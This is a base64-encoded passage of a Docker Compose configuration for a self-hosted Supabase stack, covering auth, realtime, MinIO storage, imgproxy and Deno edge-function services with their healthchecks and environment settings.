ZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5OTk5L2hlYWx0aCcKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIEdPVFJVRV9BUElfSE9TVD0wLjAuMC4wCiAgICAgIC0gR09UUlVFX0FQSV9QT1JUPTk5OTkKICAgICAgLSAnQVBJX0VYVEVSTkFMX1VSTD0ke0FQSV9FWFRFUk5BTF9VUkw6LWh0dHA6Ly9zdXBhYmFzZS1rb25nOjgwMDB9JwogICAgICAtIEdPVFJVRV9EQl9EUklWRVI9cG9zdGdyZXMKICAgICAgLSAnR09UUlVFX0RCX0RBVEFCQVNFX1VSTD1wb3N0Z3JlczovL3N1cGFiYXNlX2F1dGhfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ0dPVFJVRV9TSVRFX1VSTD0ke1NFUlZJQ0VfVVJMX1NVUEFCQVNFS09OR30nCiAgICAgIC0gJ0dPVFJVRV9VUklfQUxMT1dfTElTVD0ke0FERElUSU9OQUxfUkVESVJFQ1RfVVJMU30nCiAgICAgIC0gJ0dPVFJVRV9ESVNBQkxFX1NJR05VUD0ke0RJU0FCTEVfU0lHTlVQOi1mYWxzZX0nCiAgICAgIC0gR09UUlVFX0pXVF9BRE1JTl9ST0xFUz1zZXJ2aWNlX3JvbGUKICAgICAgLSBHT1RSVUVfSldUX0FVRD1hdXRoZW50aWNhdGVkCiAgICAgIC0gR09UUlVFX0pXVF9ERUZBVUxUX0dST1VQX05BTUU9YXV0aGVudGljYXRlZAogICAgICAtICdHT1RSVUVfSldUX0VYUD0ke0pXVF9FWFBJUlk6LTM2MDB9JwogICAgICAtICdHT1RSVUVfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnR09UUlVFX0VYVEVSTkFMX0VNQUlMX0VOQUJMRUQ9JHtFTkFCTEVfRU1BSUxfU0lHTlVQOi10cnVlfScKICAgICAgLSAnR09UUlVFX0VYVEVSTkFMX0FOT05ZTU9VU19VU0VSU19FTkFCTEVEPSR7RU5BQkxFX0FOT05ZTU9VU19VU0VSUzotZmFsc2V9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX0FVVE9DT05GSVJNPSR7RU5BQkxFX0VNQUlMX0FVVE9DT05GSVJNOi1mYWxzZX0nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX0FETUlOX0VNQUlMPSR7U01UUF9BRE1JTl9FTUFJTH0nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX0hPU1Q9JHtTTVRQX0hPU1R9JwogICAgICAtICdHT1RSVUVfU01UUF9QT1JUPSR7U01UUF9QT1JUOi01ODd9JwogICAgICAtICdHT1RSVUVfU01UUF9VU0VSPSR7U01UUF9VU0VSfScKICAgICAgLSAnR09UUlVFX1NNVFBfUEFTUz0ke1NNVFBfUEFTU30nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX1NFTkRFUl9OQU1FPSR7U01UUF9TRU5ERVJfTkFNRX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVVJMUEFUSFNfSU5WSVRFPSR7TUFJTEVSX1VSTFBBVEhTX0lOVklURTotL2F1dGgvdjEvdmVyaWZ5fScKICAgICAgLSAnR09UUlVFX01BSUxFUl9VUkxQQVRIU19DT05GSVJNQVRJT049JHtNQUlMRVJfVVJMUEFUSFNfQ09ORklSTUFUSU9OOi0vYXV0aC92MS92ZXJpZnl9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1VSTFBBVEhTX1JFQ09WRVJZPSR7TUFJTEVSX1VSTFBBVEhTX1JFQ09WRVJZOi0vYXV0aC92MS92ZXJpZnl9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1VSTFBBVEhTX0VNQUlMX0NIQU5HRT0ke01BSUxFUl9VUkxQQVRIU19FTUFJTF9DSEFOR0U6LS9hdXRoL3YxL3ZlcmlmeX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVEVNUExBVEVTX0lOVklURT0ke01BSUxFUl9URU1QTEFURVNfSU5WSVRFfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfQ09ORklSTUFUSU9OPSR7TUFJTEVSX1RFTVBMQVRFU19DT05GSVJNQVRJT059JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1RFTVBMQVRFU19SRUNPVkVSWT0ke01BSUxFUl9URU1QTEFURVNfUkVDT1ZFUll9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1RFTVBMQVRFU19NQUdJQ19MSU5LPSR7TUFJTEVSX1RFTVBMQVRFU19NQUdJQ19MSU5LfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfRU1BSUxfQ0hBTkdFPSR7TUFJTEVSX1RFTVBMQVRFU19FTUFJTF9DSEFOR0V9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX0NPTkZJUk1BVElPTj0ke01BSUxFUl9TVUJKRUNUU19DT05GSVJNQVRJT059JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX1JFQ09WRVJZPSR7TUFJTEVSX1NVQkpFQ1RTX1JFQ09WRVJZfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19NQUdJQ19MSU5LPSR7TUFJTEVSX1NVQkpFQ1RTX01BR0lDX0xJTkt9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX0VNQUlMX0NIQU5HRT0ke01BSUxFUl9TVUJKRUNUU19FTUFJTF9DSEFOR0V9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX0lOVklURT0ke01BSUxFUl9TVUJKRUNUU19JTlZJVEV9JwogICAgICAtICdHT1RSVUVfRVhURVJOQUxfUEhPTkVfRU5BQkxFRD0ke0VOQUJMRV9QSE9ORV9TSUdOVVA6LXRydWV9JwogICAgICAtICdHT1RSVUVfU01TX0FVVE9DT05GSVJNPSR7RU5BQkxFX1BIT05FX0FVVE9DT05GSVJNOi10cnVlfScKICByZWFsdGltZS1kZXY6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3JlYWx0aW1lOnYyLjM0LjQ3JwogICAgY29udGFpbmVyX25hbWU6IHJlYWx0aW1lLWRldi5zdXBhYmFzZS1yZWFsdGltZQogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1zU2ZMJwogICAgICAgIC0gJy0taGVhZCcKICAgICAgICAtICctbycKICAgICAgICAtIC9kZXYvbnVsbAogICAgICAgIC0gJy1IJwogICAgICAgIC0gJ0F1dGhvcml6YXRpb246IEJlYXJlciAke1NFUlZJQ0VfU1VQQUJBU0VBTk9OX0tFWX0nCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo0MDAwL2FwaS90ZW5hbnRzL3JlYWx0aW1lLWRldi9oZWFsdGgnCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIGludGVydmFsOiA1cwogICAgICByZXRyaWVzOiAzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1JUPTQwMDAKICAgICAgLSAnREJfSE9TVD0ke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn0nCiAgICAgIC0gJ0RCX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSBEQl9VU0VSPXN1cGFiYXNlX2FkbWluCiAgICAgIC0gJ0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ0RCX05BTUU9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdEQl9BRlRFUl9DT05ORUNUX1FVRVJZPVNFVCBzZWFyY2hfcGF0aCBUTyBfcmVhbHRpbWUnCiAgICAgIC0gREJfRU5DX0tFWT1zdXBhYmFzZXJlYWx0aW1lCiAgICAgIC0gJ0FQSV9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIEZMWV9BTExPQ19JRD1mbHkxMjMKICAgICAgLSBGTFlfQVBQX05BTUU9cmVhbHRpbWUKICAgICAgLSAnU0VDUkVUX0tFWV9CQVNFPSR7U0VDUkVUX1BBU1NXT1JEX1JFQUxUSU1FfScKICAgICAgLSAnRVJMX0FGTEFHUz0tcHJvdG9fZGlzdCBpbmV0X3RjcCcKICAgICAgLSBFTkFCTEVfVEFJTFNDQUxFPWZhbHNlCiAgICAgIC0gIkROU19OT0RFUz0nJyIKICAgICAgLSBSTElNSVRfTk9GSUxFPTEwMDAwCiAgICAgIC0gQVBQX05BTUU9cmVhbHRpbWUKICAgICAgLSBTRUVEX1NFTEZfSE9TVD10cnVlCiAgICAgIC0gTE9HX0xFVkVMPWVycm9yCiAgICAgIC0gUlVOX0pBTklUT1I9dHJ1ZQogICAgICAtIEpBTklUT1JfSU5URVJWQUw9NjAwMDAKICAgIGNvbW1hbmQ6ICJzaCAtYyBcIi9hcHAvYmluL21pZ3JhdGUgJiYgL2FwcC9iaW4vcmVhbHRpbWUgZXZhbCAnUmVhbHRpbWUuUmVsZWFzZS5zZWVkcyhSZWFsdGltZS5SZXBvKScgJiYgL2FwcC9iaW4vc2VydmVyXCJcbiIKICBzdXBhYmFzZS1taW5pbzoKICAgIGltYWdlOiAnZ2hjci5pby9jb29sbGFic2lvL21pbmlvOlJFTEVBU0UuMjAyNS0xMC0xNVQxNy0yOS01NVonCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTUlOSU9fUk9PVF9VU0VSPSR7U0VSVklDRV9VU0VSX01JTklPfScKICAgICAgLSAnTUlOSU9fUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTUlOSU99JwogICAgY29tbWFuZDogJ3NlcnZlciAtLWNvbnNvbGUtYWRkcmVzcyAiOjkwMDEiIC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIG1jCiAgICAgICAgLSByZWFkeQogICAgICAgIC0gbG9jYWwKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgdm9sdW1lczoKICAgICAgLSAnLi92b2x1bWVzL3N0b3JhZ2U6L2RhdGEnCiAgbWluaW8tY3JlYXRlYnVja2V0OgogICAgaW1hZ2U6IG1pbmlvL21jCiAgICByZXN0YXJ0OiAnbm8nCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTUlOSU9fUk9PVF9VU0VSPSR7U0VSVklDRV9VU0VSX01JTklPfScKICAgICAgLSAnTUlOSU9fUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTUlOSU99JwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtbWluaW86CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudHJ5cG9pbnQ6CiAgICAgIC0gL2VudHJ5cG9pbnQuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2VudHJ5cG9pbnQuc2gKICAgICAgICB0YXJnZXQ6IC9lbnRyeXBvaW50LnNoCiAgICAgICAgY29udGVudDogIiMhL2Jpbi9zaFxuL3Vzci9iaW4vbWMgYWxpYXMgc2V0IHN1cGFiYXNlLW1pbmlvIGh0dHA6Ly9zdXBhYmFzZS1taW5pbzo5MDAwICR7TUlOSU9fUk9PVF9VU0VSfSAke01JTklPX1JPT1RfUEFTU1dPUkR9O1xuL3Vzci9iaW4vbWMgbWIgLS1pZ25vcmUtZXhpc3Rpbmcgc3VwYWJhc2UtbWluaW8vc3R1YjtcbmV4aXQgMFxuIgogIHN1cGFiYXNlLXN0b3JhZ2U6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3N0b3JhZ2UtYXBpOnYxLjE0LjYnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBzdXBhYmFzZS1yZXN0OgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9zdGFydGVkCiAgICAgIGltZ3Byb3h5OgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9zdGFydGVkCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo1MDAwL3N0YXR1cycKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZFUl9QT1JUPTUwMDAKICAgICAgLSBTRVJWRVJfUkVHSU9OPWxvY2FsCiAgICAgIC0gTVVMVElfVEVOQU5UPWZhbHNlCiAgICAgIC0gJ0FVVEhfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vc3VwYWJhc2Vfc3RvcmFnZV9hZG1pbjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSBEQl9JTlNUQUxMX1JPTEVTPWZhbHNlCiAgICAgIC0gU1RPUkFHRV9CQUNLRU5EPXMzCiAgICAgIC0gU1RPUkFHRV9TM19CVUNLRVQ9c3R1YgogICAgICAtICdTVE9SQUdFX1MzX0VORFBPSU5UPWh0dHA6Ly9zdXBhYmFzZS1taW5pbzo5MDAwJwogICAgICAtIFNUT1JBR0VfUzNfRk9SQ0VfUEFUSF9TVFlMRT10cnVlCiAgICAgIC0gU1RPUkFHRV9TM19SRUdJT049dXMtZWFzdC0xCiAgICAgIC0gJ0FXU19BQ0NFU1NfS0VZX0lEPSR7U0VSVklDRV9VU0VSX01JTklPfScKICAgICAgLSAnQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9NSU5JT30nCiAgICAgIC0gVVBMT0FEX0ZJTEVfU0laRV9MSU1JVD01MjQyODgwMDAKICAgICAgLSBVUExPQURfRklMRV9TSVpFX0xJTUlUX1NUQU5EQVJEPTUyNDI4ODAwMAogICAgICAtIFVQTE9BRF9TSUdORURfVVJMX0VYUElSQVRJT05fVElNRT0xMjAKICAgICAgLSBUVVNfVVJMX1BBVEg9dXBsb2FkL3Jlc3VtYWJsZQogICAgICAtIFRVU19NQVhfU0laRT0zNjAwMDAwCiAgICAgIC0gRU5BQkxFX0lNQUdFX1RSQU5TRk9STUFUSU9OPXRydWUKICAgICAgLSAnSU1HUFJPWFlfVVJMPWh0dHA6Ly9pbWdwcm94eTo4MDgwJwogICAgICAtIElNR1BST1hZX1JFUVVFU1RfVElNRU9VVD0xNQogICAgICAtIERBVEFCQVNFX1NFQVJDSF9QQVRIPXN0b3JhZ2UKICAgICAgLSBOT0RFX0VOVj1wcm9kdWN0aW9uCiAgICAgIC0gUkVRVUVTVF9BTExPV19YX0ZPUldBUkRFRF9QQVRIPXRydWUKICAgIHZvbHVtZXM6CiAgICAgIC0gJy4vdm9sdW1lcy9zdG9yYWdlOi92YXIvbGliL3N0b3JhZ2UnCiAgaW1ncHJveHk6CiAgICBpbWFnZTogJ2RhcnRoc2ltL2ltZ3Byb3h5OnYzLjguMCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBpbWdwcm94eQogICAgICAgIC0gaGVhbHRoCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIGludGVydmFsOiA1cwogICAgICByZXRyaWVzOiAzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBJTUdQUk9YWV9MT0NBTF9GSUxFU1lTVEVNX1JPT1Q9LwogICAgICAtIElNR1BST1hZX1VTRV9FVEFHPXRydWUKICAgICAgLSAnSU1HUFJPWFlfRU5BQkxFX1dFQlBfREVURUNUSU9OPSR7SU1HUFJPWFlfRU5BQkxFX1dFQlBfREVURUNUSU9OOi10cnVlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJy4vdm9sdW1lcy9zdG9yYWdlOi92YXIvbGliL3N0b3JhZ2UnCiAgc3VwYWJhc2UtbWV0YToKICAgIGltYWdlOiAnc3VwYWJhc2UvcG9zdGdyZXMtbWV0YTp2MC44OS4zJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQR19NRVRBX1BPUlQ9ODA4MAogICAgICAtICdQR19NRVRBX0RCX0hPU1Q9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdQR19NRVRBX0RCX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUEdfTUVUQV9EQl9OQU1FPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSBQR19NRVRBX0RCX1VTRVI9c3VwYWJhc2VfYWRtaW4KICAgICAgLSAnUEdfTUVUQV9EQl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogIHN1cGFiYXNlLWVkZ2UtZnVuY3Rpb25zOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9lZGdlLXJ1bnRpbWU6djEuNjcuNCcKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGVjaG8KICAgICAgICAtICdFZGdlIEZ1bmN0aW9ucyBpcyBoZWFsdGh5JwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ1NVUEFCQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX1NVUEFCQVNFS09OR30nCiAgICAgIC0gJ1NVUEFCQVNFX0FOT05fS0VZPSR7U0VSVklDRV9TVVBBQkFTRUFOT05fS0VZfScKICAgICAgLSAnU1VQQUJBU0VfU0VSVklDRV9ST0xFX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VTRVJWSUNFX0tFWX0nCiAgICAgIC0gJ1NVUEFCQVNFX0RCX1VSTD1wb3N0Z3Jlc3FsOi8vcG9zdGdyZXM6JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ1ZFUklGWV9KV1Q9JHtGVU5DVElPTlNfVkVSSUZZX0pXVDotZmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnLi92b2x1bWVzL2Z1bmN0aW9uczovaG9tZS9kZW5vL2Z1bmN0aW9ucycKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9mdW5jdGlvbnMvbWFpbi9pbmRleC50cwogICAgICAgIHRhcmdldDogL2hvbWUvZGVuby9mdW5jdGlvbnMvbWFpbi9pbmRleC50cwogICAgICAgIGNvbnRlbnQ6ICJpbXBvcnQgeyBzZXJ2ZSB9IGZyb20gJ2h0dHBzOi8vZGVuby5sYW5kL3N0ZEAwLjEzMS4wL2h0dHAvc2VydmVyLnRzJ1xuaW1wb3J0ICogYXMgam9zZSBmcm9tICdodHRwczovL2Rlbm8ubGFuZC94L2pvc2VAdjQuMTQuNC9pbmRleC50cydcblxuY29uc29sZS5sb2coJ21haW4gZnVuY3Rpb24gc3RhcnRlZCcpXG5cbmNvbnN0IEpXVF9TRUNSRVQgPSBEZW5vLmVudi5nZXQoJ0pXVF9TRUNSRVQnKVxuY29uc3QgVkVSSUZZX0pXVCA9IERlbm8uZW52LmdldCgnVkVSSUZZX0pXVCcpID09PSAndHJ1ZSdcblxuZnVuY3Rpb24gZ2V0QXV0aFRva2VuKHJlcTogUmVxdWVzdCkge1xuICBjb25zdCBhdXRoSGVhZGVyID0gcmVxLmhlYWRlcnMuZ2V0KCdhdXRob3JpemF0aW9uJylcbiAgaWYgKCFhdXRoSGVhZGVyKSB7XG4gICAgdGhyb3cgbmV3IEVycm9yKCdNaXNzaW5nIGF1dGhvcml6YXRpb24gaGVhZGVyJylcbiAgfVxuICBjb25zdCBbYmVhcmVyLCB0b2tlbl0gPSBhdXRoSGVhZGVyLnNwbGl0KCcgJylcbiAgaWYgKGJlYXJlciAhPT0gJ0JlYXJlcicpIHtcbiAgICB0aHJvdyBuZXcgRXJyb3IoYEF1dGggaGVhZGVyIGlzIG5vdCAnQmVhcmVyIHt0b2tlbn0nYClcbiAgfVxuICByZXR1cm4gdG9rZW5cbn1cblxuYXN5bmMgZnVuY3Rpb24gdmVyaWZ5SldUKGp3dDogc3RyaW5nKTogUHJvbWlzZTxib29sZWFuPiB7XG4gIGNvbnN0IGVuY29kZXIgPSBuZXcgVGV4dEVuY29kZXIoKVxuICBjb25zdCBzZWNyZXRLZXkgPSBlbmNvZGVyLmVuY29kZShKV1RfU0VDUkVUKVxuICB0cnkge1xuICAgIGF3YWl0IGpvc2Uuand0VmVyaWZ5KGp3dCwgc2VjcmV0S2V5KVxuICB9IGNhdGNoIChlcnIpIHtcbiAgICBjb25zb2xlLmVycm9yKGVycilcbiAgICByZXR1cm4gZmFsc2VcbiAgfVxuICByZXR1cm4gdHJ1ZVxufVxuXG5zZXJ2ZShhc3luYyAocmVxOiBSZXF1ZXN0KSA9PiB7XG4gIGlmIChyZXEubWV0aG9kICE9PSAnT1BUSU9OUycgJiYgVkVSSUZZX0pXVCkge1xuICAgIHRyeSB7XG4gICAgICBjb25zdCB0b2tlbiA9IGdldEF1dGhUb2tlbihyZXEpXG4gICAgICBjb25zdCBpc1ZhbGlkSldUID0gYXdhaXQgdmVyaWZ5SldUKHRva2VuKVxuXG4gICAgICBpZiAoIWlzVmFsaWRKV1QpIHtcbiAgICAgICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeSh7IG1zZzogJ0ludmFsaWQgSldUJyB9KSwge1xuICAgICAgICAgIHN0YXR1czogNDAxLFxuICAgICAgICAgIGhlYWRlcnM6IHsgJ0NvbnRlbnQtVHlwZSc6ICdhcHBsaWNhdGlvbi9qc29uJyB9LFxuICAgICAgICB9KVxuICAgICAgfVxuICAgIH0gY2F0Y2ggKGUpIHtcbiAgICAgIGNvbnNvbGUuZXJyb3IoZSlcbiAgICAgIHJldHVybiBuZXcgUmVzcG9uc2UoSlNPTi5zdHJpbmdpZnkoeyBtc2c6IGUudG9TdHJpbmcoKSB9KSwge1xuICAgICAgICBzdGF0dXM6IDQwMSxcbiAgICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgICB9KVxuICAgIH1cbiAgfVxuXG4gIGNvbnN0IHVybCA9IG5ldyBVUkwocmVxLnVybClcbiAgY29uc3QgeyBwYXRobmFtZSB9ID0gdXJsXG4gIGNvbnN0IHBhdGhfcGFydHMgPSBwYXRobmFtZS5zcGxpdCgnLycpXG4gIGNvbnN0IHNlcnZpY2VfbmFtZSA9IHBhdGhfcGFydHNbMV1cblxuICBpZiAoIXNlcnZpY2VfbmFtZSB8fCBzZXJ2aWNlX25hbWUgPT09ICcnKSB7XG4gICAgY29uc3QgZXJyb3IgPSB7IG1zZzogJ21pc3NpbmcgZnVuY3Rpb24gbmFtZSBpbiByZXF1ZXN0JyB9XG4gICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeShlcnJvciksIHtcbiAgICAgIHN0YXR1czogNDAwLFxuICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgfSlcbiAgfVxuXG4gIGNvbnN0IHNlcnZpY2VQYXRoID0gYC9ob21lL2Rlbm8vZnVuY3Rpb25zLyR7c2VydmljZV9uYW1lfWBcbiAgY29uc29sZS5lcnJvcihgc2VydmluZyB0aGUgcmVxdWVzdCB3aXRoICR7c2VydmljZVBhdGh9YClcblxuICBjb25zdCBtZW1vcnlMaW1pdE1iID0gMTUwXG4gIGNvbnN0IHdvcmtlclRpbWVvdXRNcyA9IDEgKiA2MCAqIDEwMDBcbiAgY29uc3Qgbm9Nb2R1bGVDYWNoZSA9IGZhbHNlXG4gIGNvbnN0IGltcG9ydE1hcFBhdGggPSBudWxsXG4gIGNvbnN0IGVudlZhcnNPYmogPSBEZW5vLmVudi50b09iamVjdCgpXG4gIGNvbnN0IGVudlZhcnMgPSBPYmplY3Qua2V5cyhlbnZWYXJzT2JqKS5tYXAoKGspID0+IFtrLCBlbnZWYXJzT2JqW2tdXSlcblxuICB0cnkge1xuICAgIGNvbnN0IHdvcmtlciA9IGF3YWl0IEVkZ2VSdW50aW1lLnVzZXJXb3JrZXJzLmNyZWF0ZSh7XG4gICAgICBzZXJ2aWNlUGF0aCxcbiAgICAgIG1lbW9yeUxpbWl0TWIsXG4gICAgICB3b3JrZXJUaW1lb3V0TXMsXG4gICAgICBub01vZHVsZUNhY2hlLFxuICAgICAgaW1wb3J0TWFwUGF0aCxcbiAgICAgIGVudlZhcnMsXG4gICAgfSlcbiAgICByZXR1cm4gYXdhaXQgd29ya2VyLmZldGNoKHJlcSlcbiAgfSBjYXRjaCAoZSkge1xuICAgIGNvbnN0IGVycm9yID0geyBtc2c6IGUudG9TdHJpbmcoKSB9XG4gICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeShlcnJvciksIHtcbiAgICAgIHN0YXR1czogNTAwLFxuICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgfSlcbiAgfVxufSkiCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZnVuY3Rpb25zL2hlbGxvL2luZGV4LnRzCiAgICAgICAgdGFyZ2V0OiAvaG9tZS9kZW5vL2Z1bmN0aW9ucy9oZWxsby9pbmRleC50cwogICAgICAgIGNvbnRlbnQ6ICIvLyBGb2xsb3cgdGhpcyBzZXR1cCBndWlkZSB0byBpbnRlZ3JhdGUgdGhlIERlbm8gbGFuZ3VhZ2Ugc2VydmVyIHdpdGggeW91ciBlZGl0b3I6XG4vLyBodHRwczovL2Rlbm8ubGFuZC9tYW51YWwvZ2V0dGluZ19zdGFydGVkL3NldHVwX3lvdXJfZW52aXJvbm1lbnRcbi8vIFRoaXMgZW5hYmxlcyBhdXRvY29tcGxldGUsIGdvIHRvIGRlZmluaXRpb24sIGV0Yy5cblxuaW1wb3J0IHsgc2VydmUgfSBmcm9tIFwiaHR0cHM6Ly9kZW5vLmxhbmQvc3RkQDAuMTc3LjEvaHR0cC9zZXJ2ZXIudHNcIlxuXG5zZXJ2ZShhc3luYyAoKSA9PiB7XG4gIHJldHVybiBuZXcgUmVzcG9uc2UoXG4gICAgYFwiSGVsbG8gZnJvbSBFZGdlIEZ1bmN0aW9ucyFcImAsXG4gICAgeyBoZWFkZXJzOiB7IFwiQ29udGVudC1UeXBlXCI6IFwiYXBwbGljYXRpb24vanNvblwiIH0gfSxcbiAgKVxufSlcblxuLy8gVG8gaW52b2tlOlxuLy8gY3VybCAnaHR0cDovL2xvY2FsaG9zdDo8S09OR19IVFRQX1